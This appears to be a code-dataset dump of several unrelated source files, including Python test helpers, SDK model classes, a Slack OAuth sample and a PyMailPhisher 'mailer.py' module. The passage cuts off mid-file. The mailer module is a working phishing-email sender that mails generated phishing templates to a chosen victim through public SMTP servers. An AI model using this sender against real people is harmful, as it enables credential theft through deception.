hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a1b2d3eb231f1084cbb9fe483ad06184b53119e
| 9,884 |
py
|
Python
|
tests/parameterized.py
|
QDucasse/PySOM
|
0b8801838a8902894dd606c0f84f1dcde79061d8
|
[
"MIT"
] | 1 |
2020-10-06T13:57:43.000Z
|
2020-10-06T13:57:43.000Z
|
tests/parameterized.py
|
QDucasse/PySOM
|
0b8801838a8902894dd606c0f84f1dcde79061d8
|
[
"MIT"
] | null | null | null |
tests/parameterized.py
|
QDucasse/PySOM
|
0b8801838a8902894dd606c0f84f1dcde79061d8
|
[
"MIT"
] | null | null | null |
# Source: https://github.com/wolever/nose-parameterized
# commit 0da3a2f0325c17858a5f5f1fdf1939520ce85e48, Aug 25, 2013
# Stefan: I removed the dependency on the six module, don't need the portability, now.
#
# tl;dr: all code code is licensed under simplified BSD, unless stated otherwise.
#
# Unless stated otherwise in the source files, all code is copyright 2010 David
# Wolever <david@wolever.net>. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL <COPYRIGHT HOLDER> OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of David Wolever.
import inspect
import re
from collections import namedtuple
from functools import wraps
from unittest import TestCase
import new
from nose.tools import nottest
new_instancemethod = new.instancemethod
_param = namedtuple("param", "args kwargs")
class param(_param):
""" Represents a single parameter to a test case.
For example::
>>> p = param("foo", bar=16)
>>> p
param("foo", bar=16)
>>> p.args
('foo', )
>>> p.kwargs
{'bar': 16}
Intended to be used as an argument to ``@parameterized``::
@parameterized([
param("foo", bar=16),
])
def test_stuff(foo, bar=16):
pass
"""
def __new__(cls, *args, **kwargs):
return _param.__new__(cls, args, kwargs)
@classmethod
def explicit(cls, args=None, kwargs=None):
""" Creates a ``param`` by explicitly specifying ``args`` and
``kwargs``::
>>> param.explicit([1,2,3])
param(*(1, 2, 3))
>>> param.explicit(kwargs={"foo": 42})
param(*(), **{"foo": "42"})
"""
args = args or ()
kwargs = kwargs or {}
return cls(*args, **kwargs)
@classmethod
def from_decorator(cls, args):
""" Returns an instance of ``param()`` for ``@parameterized`` argument
``args``::
>>> param.from_decorator((42, ))
param(args=(42, ), kwargs={})
>>> param.from_decorator("foo")
param(args=("foo", ), kwargs={})
"""
if isinstance(args, param):
return args
if isinstance(args, basestring):
args = (args,)
return cls(*args)
def __repr__(self):
return "param(*%r, **%r)" % self
class parameterized(object):
""" Parameterize a test case::
class TestInt(object):
@parameterized([
("A", 10),
("F", 15),
param("10", 42, base=42)
])
def test_int(self, input, expected, base=16):
actual = int(input, base=base)
assert_equal(actual, expected)
@parameterized([
(2, 3, 5)
(3, 5, 8),
])
def test_add(a, b, expected):
assert_equal(a + b, expected)
"""
def __init__(self, input):
self.get_input = self.input_as_callable(input)
def __call__(self, test_func):
self.assert_not_in_testcase_subclass()
@wraps(test_func)
def parameterized_helper_method(test_self=None):
f = test_func
if test_self is not None:
# If we are a test method (which we suppose to be true if we
# are being passed a "self" argument), we first need to create
# an instance method, attach it to the instance of the test
# class, then pull it back off to turn it into a bound method.
# If we don't do this, Nose gets cranky.
f = self.make_bound_method(test_self, test_func)
# Note: because nose is so very picky, the more obvious
# ``return self.yield_nose_tuples(f)`` won't work here.
for nose_tuple in self.yield_nose_tuples(f):
yield nose_tuple
test_func.__name__ = "_helper_for_%s" % (test_func.__name__,)
parameterized_helper_method.parameterized_input = input
parameterized_helper_method.parameterized_func = test_func
return parameterized_helper_method
def yield_nose_tuples(self, func):
for args in self.get_input():
p = param.from_decorator(args)
# ... then yield that as a tuple. If those steps aren't
# followed precicely, Nose gets upset and doesn't run the test
# or doesn't run setup methods.
yield self.param_as_nose_tuple(p, func)
def param_as_nose_tuple(self, p, func):
nose_func = func
nose_args = p.args
if p.kwargs:
nose_func = wraps(func)(lambda args, kwargs: func(*args, **kwargs))
nose_args = (p.args, p.kwargs)
return (nose_func,) + nose_args
def make_bound_method(self, instance, func):
cls = type(instance)
im_f = new_instancemethod(func, None, cls)
setattr(cls, func.__name__, im_f)
return getattr(instance, func.__name__)
def assert_not_in_testcase_subclass(self):
parent_classes = self._terrible_magic_get_defining_classes()
if any(issubclass(cls, TestCase) for cls in parent_classes):
raise Exception("Warning: '@parameterized' tests won't work "
"inside subclasses of 'TestCase' - use "
"'@parameterized.expand' instead")
def _terrible_magic_get_defining_classes(self):
""" Returns the set of parent classes of the class currently being defined.
Will likely only work if called from the ``parameterized`` decorator.
This function is entirely @brandon_rhodes's fault, as he suggested
the implementation: http://stackoverflow.com/a/8793684/71522
"""
stack = inspect.stack()
if len(stack) <= 4:
return []
frame = stack[4]
code_context = frame[4] and frame[4][0].strip()
if not (code_context and code_context.startswith("class ")):
return []
_, parents = code_context.split("(", 1)
parents, _ = parents.rsplit(")", 1)
return eval("[" + parents + "]", frame[0].f_globals, frame[0].f_locals)
@classmethod
def input_as_callable(cls, input):
if callable(input):
return lambda: cls.check_input_values(input())
input_values = cls.check_input_values(input)
return lambda: input_values
@classmethod
def check_input_values(cls, input_values):
if not hasattr(input_values, "__iter__"):
raise ValueError("expected iterable input; got %r" % (input,))
return input_values
@classmethod
def expand(cls, input):
""" A "brute force" method of parameterizing test cases. Creates new
test cases and injects them into the namespace that the wrapped
function is being defined in. Useful for parameterizing tests in
subclasses of 'UnitTest', where Nose test generators don't work.
>>> @parameterized.expand([("foo", 1, 2)])
... def test_add1(name, input, expected):
... actual = add1(input)
... assert_equal(actual, expected)
...
>>> locals()
... 'test_add1_foo_0': <function ...> ...
>>>
"""
def parameterized_expand_wrapper(f):
stack = inspect.stack()
frame = stack[1]
frame_locals = frame[0].f_locals
base_name = f.__name__
get_input = cls.input_as_callable(input)
for num, args in enumerate(get_input()):
p = param.from_decorator(args)
name_suffix = "_%s" % (num,)
if len(p.args) > 0 and isinstance(p.args[0], basestring):
name_suffix += "_" + cls.to_safe_name(p.args[0])
name = base_name + name_suffix
frame_locals[name] = cls.param_as_standalone_func(p, f, name)
return nottest(f)
return parameterized_expand_wrapper
@classmethod
def param_as_standalone_func(cls, p, func, name):
standalone_func = lambda *a: func(*(a + p.args), **p.kwargs)
standalone_func.__name__ = name
return standalone_func
@classmethod
def to_safe_name(cls, s):
return str(re.sub("[^a-zA-Z0-9_]", "", s))
| 38.310078 | 86 | 0.600668 |
4a1b2e0eb2f9435bab1be938b7722f886c62447b
| 5,505 |
py
|
Python
|
3.7.0/lldb-3.7.0.src/test/lang/cpp/stl/TestSTL.py
|
androm3da/clang_sles
|
2ba6d0711546ad681883c42dfb8661b842806695
|
[
"MIT"
] | 3 |
2016-02-10T14:18:40.000Z
|
2018-02-05T03:15:56.000Z
|
3.7.0/lldb-3.7.0.src/test/lang/cpp/stl/TestSTL.py
|
androm3da/clang_sles
|
2ba6d0711546ad681883c42dfb8661b842806695
|
[
"MIT"
] | 1 |
2016-02-10T15:40:03.000Z
|
2016-02-10T15:40:03.000Z
|
3.7.0/lldb-3.7.0.src/test/lang/cpp/stl/TestSTL.py
|
androm3da/clang_sles
|
2ba6d0711546ad681883c42dfb8661b842806695
|
[
"MIT"
] | null | null | null |
"""
Test some expressions involving STL data types.
"""
import os, time
import unittest2
import lldb
import lldbutil
from lldbtest import *
class STLTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
# rdar://problem/10400981
@unittest2.expectedFailure
@skipUnlessDarwin
@dsym_test
def test_with_dsym(self):
"""Test some expressions involving STL data types."""
self.buildDsym()
self.step_stl_exprs()
# rdar://problem/10400981
@unittest2.expectedFailure
@dwarf_test
def test_with_dwarf(self):
"""Test some expressions involving STL data types."""
self.buildDwarf()
self.step_stl_exprs()
@python_api_test
@dsym_test
@skipUnlessDarwin
def test_SBType_template_aspects_with_dsym(self):
"""Test APIs for getting template arguments from an SBType."""
self.buildDsym()
self.sbtype_template_apis()
@expectedFailureIcc # icc 13.1 and 14-beta do not emit DW_TAG_template_type_parameter
@python_api_test
@dwarf_test
def test_SBType_template_aspects_with_dwarf(self):
"""Test APIs for getting template arguments from an SBType."""
self.buildDwarf()
self.sbtype_template_apis()
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.cpp'
self.line = line_number(self.source, '// Set break point at this line.')
def step_stl_exprs(self):
"""Test some expressions involving STL data types."""
exe = os.path.join(os.getcwd(), "a.out")
# The following two lines, if uncommented, will enable loggings.
#self.ci.HandleCommand("log enable -f /tmp/lldb.log lldb default", res)
#self.assertTrue(res.Succeeded())
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# rdar://problem/8543077
# test/stl: clang built binaries results in the breakpoint locations = 3,
# is this a problem with clang generated debug info?
lldbutil.run_break_set_by_file_and_line (self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# Stop at 'std::string hello_world ("Hello World!");'.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['main.cpp:%d' % self.line,
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs = [' resolved, hit count = 1'])
# Now try some expressions....
self.runCmd('expr for (int i = 0; i < hello_world.length(); ++i) { (void)printf("%c\\n", hello_world[i]); }')
# rdar://problem/10373783
# rdar://problem/10400981
self.expect('expr associative_array.size()',
substrs = [' = 3'])
self.expect('expr associative_array.count(hello_world)',
substrs = [' = 1'])
self.expect('expr associative_array[hello_world]',
substrs = [' = 1'])
self.expect('expr associative_array["hello"]',
substrs = [' = 2'])
def sbtype_template_apis(self):
"""Test APIs for getting template arguments from an SBType."""
exe = os.path.join(os.getcwd(), 'a.out')
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple (None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# Get Frame #0.
self.assertTrue(process.GetState() == lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)
self.assertTrue(thread.IsValid(), "There should be a thread stopped due to breakpoint condition")
frame0 = thread.GetFrameAtIndex(0)
# Get the type for variable 'associative_array'.
associative_array = frame0.FindVariable('associative_array')
self.DebugSBValue(associative_array)
self.assertTrue(associative_array, VALID_VARIABLE)
map_type = associative_array.GetType()
self.DebugSBType(map_type)
self.assertTrue(map_type, VALID_TYPE)
num_template_args = map_type.GetNumberOfTemplateArguments()
self.assertTrue(num_template_args > 0)
# We expect the template arguments to contain at least 'string' and 'int'.
expected_types = { 'string': False, 'int': False }
for i in range(num_template_args):
t = map_type.GetTemplateArgumentType(i)
self.DebugSBType(t)
self.assertTrue(t, VALID_TYPE)
name = t.GetName()
if 'string' in name:
expected_types['string'] = True
elif 'int' == name:
expected_types['int'] = True
# Check that both entries of the dictionary have 'True' as the value.
self.assertTrue(all(expected_types.values()))
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
| 36.946309 | 119 | 0.64614 |
4a1b2f3cef995f9d33e0e9f7610186eaa6d67d4d
| 2,405 |
py
|
Python
|
azure/mgmt/sql/models/metric_definition.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1 |
2022-01-25T22:52:58.000Z
|
2022-01-25T22:52:58.000Z
|
azure/mgmt/sql/models/metric_definition.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
azure/mgmt/sql/models/metric_definition.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class MetricDefinition(Model):
"""A database metric definition.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: The name information for the metric.
:vartype name: ~azure.mgmt.sql.models.MetricName
:ivar primary_aggregation_type: The primary aggregation type defining how
metric values are displayed. Possible values include: 'None', 'Average',
'Count', 'Minimum', 'Maximum', 'Total'
:vartype primary_aggregation_type: str or
~azure.mgmt.sql.models.PrimaryAggregationType
:ivar resource_uri: The resource uri of the database.
:vartype resource_uri: str
:ivar unit: The unit of the metric. Possible values include: 'Count',
'Bytes', 'Seconds', 'Percent', 'CountPerSecond', 'BytesPerSecond'
:vartype unit: str or ~azure.mgmt.sql.models.UnitDefinitionType
:ivar metric_availabilities: The list of database metric availabities for
the metric.
:vartype metric_availabilities:
list[~azure.mgmt.sql.models.MetricAvailability]
"""
_validation = {
'name': {'readonly': True},
'primary_aggregation_type': {'readonly': True},
'resource_uri': {'readonly': True},
'unit': {'readonly': True},
'metric_availabilities': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'MetricName'},
'primary_aggregation_type': {'key': 'primaryAggregationType', 'type': 'str'},
'resource_uri': {'key': 'resourceUri', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'metric_availabilities': {'key': 'metricAvailabilities', 'type': '[MetricAvailability]'},
}
def __init__(self):
self.name = None
self.primary_aggregation_type = None
self.resource_uri = None
self.unit = None
self.metric_availabilities = None
| 39.42623 | 97 | 0.633264 |
4a1b30dd7a5e6b92c805d76d767f7a3537160530
| 1,346 |
py
|
Python
|
samples/bottle/oauth_app.py
|
misscoded/bolt-python
|
ed26ea039c37cbd00551e25deac0fb1871c03aed
|
[
"MIT"
] | 1 |
2020-11-11T19:19:20.000Z
|
2020-11-11T19:19:20.000Z
|
samples/bottle/oauth_app.py
|
misscoded/bolt-python
|
ed26ea039c37cbd00551e25deac0fb1871c03aed
|
[
"MIT"
] | null | null | null |
samples/bottle/oauth_app.py
|
misscoded/bolt-python
|
ed26ea039c37cbd00551e25deac0fb1871c03aed
|
[
"MIT"
] | null | null | null |
# ------------------------------------------------
# instead of slack_bolt in requirements.txt
import sys
sys.path.insert(1, "../../src")
# ------------------------------------------------
import logging
from slack_bolt import App
from slack_bolt.adapter.bottle import SlackRequestHandler
logging.basicConfig(level=logging.DEBUG)
app = App()
@app.middleware # or app.use(log_request)
def log_request(logger, payload, next):
logger.debug(payload)
return next()
@app.event("app_mention")
def event_test(ack, payload, say, logger):
logger.info(payload)
say("What's up?")
from bottle import get, post, request, response, run
handler = SlackRequestHandler(app)
@post("/slack/events")
def slack_events():
return handler.handle(request, response)
@get("/slack/install")
def install():
return handler.handle(request, response)
@get("/slack/oauth_redirect")
def oauth_redirect():
return handler.handle(request, response)
if __name__ == "__main__":
run(host="0.0.0.0", port=3000, reloader=True)
# pip install -r requirements.txt
# # -- OAuth flow -- #
# export SLACK_SIGNING_SECRET=***
# export SLACK_BOT_TOKEN=xoxb-***
# export SLACK_CLIENT_ID=111.111
# export SLACK_CLIENT_SECRET=***
# export SLACK_SCOPES=app_mentions:read,chat:write
# FLASK_APP=oauth_app.py FLASK_ENV=development flask run -p 3000
| 22.065574 | 64 | 0.675334 |
4a1b31b37195c7991e5e0456dbabde351a90acfb
| 1,059 |
py
|
Python
|
qt_multiprocessing/close_app_helper.py
|
justengel/qt_multiprocessing
|
0cae9797a6ec21128313376222325ef40ec53d75
|
[
"MIT"
] | 21 |
2018-08-14T03:46:03.000Z
|
2022-02-05T19:53:25.000Z
|
qt_multiprocessing/close_app_helper.py
|
justengel/qt_multiprocessing
|
0cae9797a6ec21128313376222325ef40ec53d75
|
[
"MIT"
] | null | null | null |
qt_multiprocessing/close_app_helper.py
|
justengel/qt_multiprocessing
|
0cae9797a6ec21128313376222325ef40ec53d75
|
[
"MIT"
] | 2 |
2018-08-14T03:39:24.000Z
|
2021-08-18T02:00:44.000Z
|
from qtpy import QtWidgets, QtCore
__all__ = ['CloseAllFilter']
class CloseAllFilter(QtCore.QObject):
"""Event filter for closing all windows if the widget is closed."""
def eventFilter(self, receiver, event):
results = super().eventFilter(receiver, event)
if event.type() == QtCore.QEvent.Close and event.isAccepted():
# Close all top level widgets that prevent the application from quitting.
try:
QtWidgets.QApplication.instance().error_dialog.setExceptHook(False)
except (AttributeError, RuntimeError, ValueError):
pass
for win in QtWidgets.QApplication.instance().topLevelWidgets():
if win != receiver:
try:
win.close()
except (AttributeError, RuntimeError):
pass
try:
win.deleteLater()
except (AttributeError, RuntimeError):
pass
return results
| 36.517241 | 85 | 0.558074 |
4a1b31bea58b5e05b920b01d391b5d9f6fe3e83b
| 2,957 |
py
|
Python
|
lib/mailer.py
|
5l1v3r1/PyMailPhisher
|
bfe4bf714c2cc8443dcc57c0f6c9fa5591ad1bd7
|
[
"Apache-2.0"
] | null | null | null |
lib/mailer.py
|
5l1v3r1/PyMailPhisher
|
bfe4bf714c2cc8443dcc57c0f6c9fa5591ad1bd7
|
[
"Apache-2.0"
] | null | null | null |
lib/mailer.py
|
5l1v3r1/PyMailPhisher
|
bfe4bf714c2cc8443dcc57c0f6c9fa5591ad1bd7
|
[
"Apache-2.0"
] | 2 |
2020-07-01T08:39:42.000Z
|
2021-11-05T07:21:18.000Z
|
import json
import sys
import os
import time
import smtplib
import getpass
from lib.colors import style
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Sending email
def send_mail(name, smtp_server, port):
print(style.GREEN('[+]') + style.RESET(f'-- SMTP {name} Configuration --'))
sender = str(input(style.GREEN('\n[+]') + style.RESET(' Sender email: ')))
password = getpass.getpass(style.GREEN('[+]') + style.RESET(" Sender email password: "))
receiver = str(input(style.GREEN('[+]') + style.RESET(' Receiver email: ')))
subject = str(input(style.GREEN('[+]') + style.RESET(' Email subject: ')))
files = os.listdir('Templates/Generated_Emails')
print(style.GREEN(style.RESET('\nGenerated Files:')))
for file in files:
print(style.RESET(f'- {file}'))
template = str(input(style.GREEN('\n[+]') + style.RESET('Generated file name [Eg: FacebookTemplate.html]: ')))
template_path = f'Templates/Generated_Emails/{template}'
if not os.path.exists(template_path):
print(style.RED('\n[!]') + style.RESET(' File does not exist, exiting...'))
sys.exit()
else:
None
print(style.GREEN('\n[+]') + style.RESET(f' Sending email to {receiver} ...'))
# sending the email with mime
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = receiver
read_template = open(template_path)
body = MIMEText(read_template.read(), 'html')
msg.attach(body)
mail = smtplib.SMTP(smtp_server, port)
mail.ehlo()
mail.starttls()
mail.login(sender, password)
mail.sendmail(sender, receiver, msg.as_string())
mail.quit()
print(style.GREEN('[+]') + style.RESET(" The phishing email has been sent successfully!"))
# Choosing the smtp server
def mailer():
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
print(style.RESET(" -- Choose a SMTP server --\n"))
print(style.GREEN('\n[1]') + style.RESET(' Gmail'))
print(style.GREEN('[2]') + style.RESET(' Outlook'))
print(style.GREEN('[3]') + style.RESET(' Yahoo'))
print(style.GREEN('[4]') + style.RESET(' Hotmail'))
try:
smtp_server= int(input(style.YELLOW('\n[+]') + style.RESET(' Enter mode ID: ')))
except:
print(style.RED('\n[!]') + style.RESET(' Wrong input, exiting...'))
sys.exit()
gmail_config = ['Gmail', 'smtp.gmail.com', 587]
outlook_config = ['Outlook', 'smtp-mail.outlook.com', 587]
hotmail_config = ['Hotmail', 'smtp.live.com', 465]
yahoo_config = ['Yahoo', 'smtp.mail.yahoo.com', 456]
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
if smtp_server == 1:
name = gmail_config[0]
smtp_server = gmail_config[1]
port = gmail_config[2]
send_mail(name, smtp_server, port)
| 39.959459 | 115 | 0.611769 |
4a1b324b001231c3e5d2ddc33c45ea57d244ed21
| 3,479 |
py
|
Python
|
sdk/lusid_asyncio/models/cds_seniority.py
|
finbourne/lusid-sdk-python-asyncio-preview
|
290f93590ab5485661216c8622d3de9f7af0ed60
|
[
"MIT"
] | null | null | null |
sdk/lusid_asyncio/models/cds_seniority.py
|
finbourne/lusid-sdk-python-asyncio-preview
|
290f93590ab5485661216c8622d3de9f7af0ed60
|
[
"MIT"
] | null | null | null |
sdk/lusid_asyncio/models/cds_seniority.py
|
finbourne/lusid-sdk-python-asyncio-preview
|
290f93590ab5485661216c8622d3de9f7af0ed60
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3923
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid_asyncio.configuration import Configuration
class CdsSeniority(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
allowed enum values
"""
UNKNOWN = "Unknown"
SNR = "SNR"
SUB = "SUB"
JRSUBUT2 = "JRSUBUT2"
PREFT1 = "PREFT1"
SECDOM = "SECDOM"
SNRFOR = "SNRFOR"
SUBLT2 = "SUBLT2"
allowable_values = [UNKNOWN, SNR, SUB, JRSUBUT2, PREFT1, SECDOM, SNRFOR, SUBLT2] # noqa: E501
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
}
attribute_map = {
}
required_map = {
}
def __init__(self, local_vars_configuration=None): # noqa: E501
"""CdsSeniority - a model defined in OpenAPI"
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self.discriminator = None
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CdsSeniority):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CdsSeniority):
return True
return self.to_dict() != other.to_dict()
| 27.393701 | 98 | 0.568267 |
4a1b32594c3e7f9968a5ffe2779d0db2614fea08
| 451 |
py
|
Python
|
django_test/django_test/views.py
|
AraxnoAnarxo/neu_uni_py_20
|
65f8ed036fac0dc22771411933bc98362e88408c
|
[
"MIT"
] | null | null | null |
django_test/django_test/views.py
|
AraxnoAnarxo/neu_uni_py_20
|
65f8ed036fac0dc22771411933bc98362e88408c
|
[
"MIT"
] | null | null | null |
django_test/django_test/views.py
|
AraxnoAnarxo/neu_uni_py_20
|
65f8ed036fac0dc22771411933bc98362e88408c
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
import random
from articles.models import Article, Tag
# Create your views here.
def home_page(request):
random_idx = random.randint(0, Article.objects.count() -1)
art_random = get_object_or_404(Article, id = random_idx +1)
#return HttpResponse('This is the home page')
return render(request, 'articles/index.html', {'article': art_random})
| 34.692308 | 74 | 0.760532 |
4a1b32b6800cb879fdb60ad8efd1a0d2901c316c
| 5,070 |
py
|
Python
|
xero_python/payrolluk/models/payment_line.py
|
parasharrk/xero-python
|
e8416f3bd893520a343af014f5bb65acbf1f4f13
|
[
"MIT"
] | null | null | null |
xero_python/payrolluk/models/payment_line.py
|
parasharrk/xero-python
|
e8416f3bd893520a343af014f5bb65acbf1f4f13
|
[
"MIT"
] | null | null | null |
xero_python/payrolluk/models/payment_line.py
|
parasharrk/xero-python
|
e8416f3bd893520a343af014f5bb65acbf1f4f13
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Xero Payroll UK
This is the Xero Payroll API for orgs in the UK region. # noqa: E501
OpenAPI spec version: 2.4.0
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class PaymentLine(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"payment_line_id": "str",
"amount": "float",
"account_number": "str",
"sort_code": "str",
"account_name": "str",
}
attribute_map = {
"payment_line_id": "paymentLineID",
"amount": "amount",
"account_number": "accountNumber",
"sort_code": "sortCode",
"account_name": "accountName",
}
def __init__(
self,
payment_line_id=None,
amount=None,
account_number=None,
sort_code=None,
account_name=None,
): # noqa: E501
"""PaymentLine - a model defined in OpenAPI""" # noqa: E501
self._payment_line_id = None
self._amount = None
self._account_number = None
self._sort_code = None
self._account_name = None
self.discriminator = None
if payment_line_id is not None:
self.payment_line_id = payment_line_id
if amount is not None:
self.amount = amount
if account_number is not None:
self.account_number = account_number
if sort_code is not None:
self.sort_code = sort_code
if account_name is not None:
self.account_name = account_name
@property
def payment_line_id(self):
"""Gets the payment_line_id of this PaymentLine. # noqa: E501
Xero identifier for payroll payment line # noqa: E501
:return: The payment_line_id of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._payment_line_id
@payment_line_id.setter
def payment_line_id(self, payment_line_id):
"""Sets the payment_line_id of this PaymentLine.
Xero identifier for payroll payment line # noqa: E501
:param payment_line_id: The payment_line_id of this PaymentLine. # noqa: E501
:type: str
"""
self._payment_line_id = payment_line_id
@property
def amount(self):
"""Gets the amount of this PaymentLine. # noqa: E501
The amount of the payment line # noqa: E501
:return: The amount of this PaymentLine. # noqa: E501
:rtype: float
"""
return self._amount
@amount.setter
def amount(self, amount):
"""Sets the amount of this PaymentLine.
The amount of the payment line # noqa: E501
:param amount: The amount of this PaymentLine. # noqa: E501
:type: float
"""
self._amount = amount
@property
def account_number(self):
"""Gets the account_number of this PaymentLine. # noqa: E501
The account number # noqa: E501
:return: The account_number of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._account_number
@account_number.setter
def account_number(self, account_number):
"""Sets the account_number of this PaymentLine.
The account number # noqa: E501
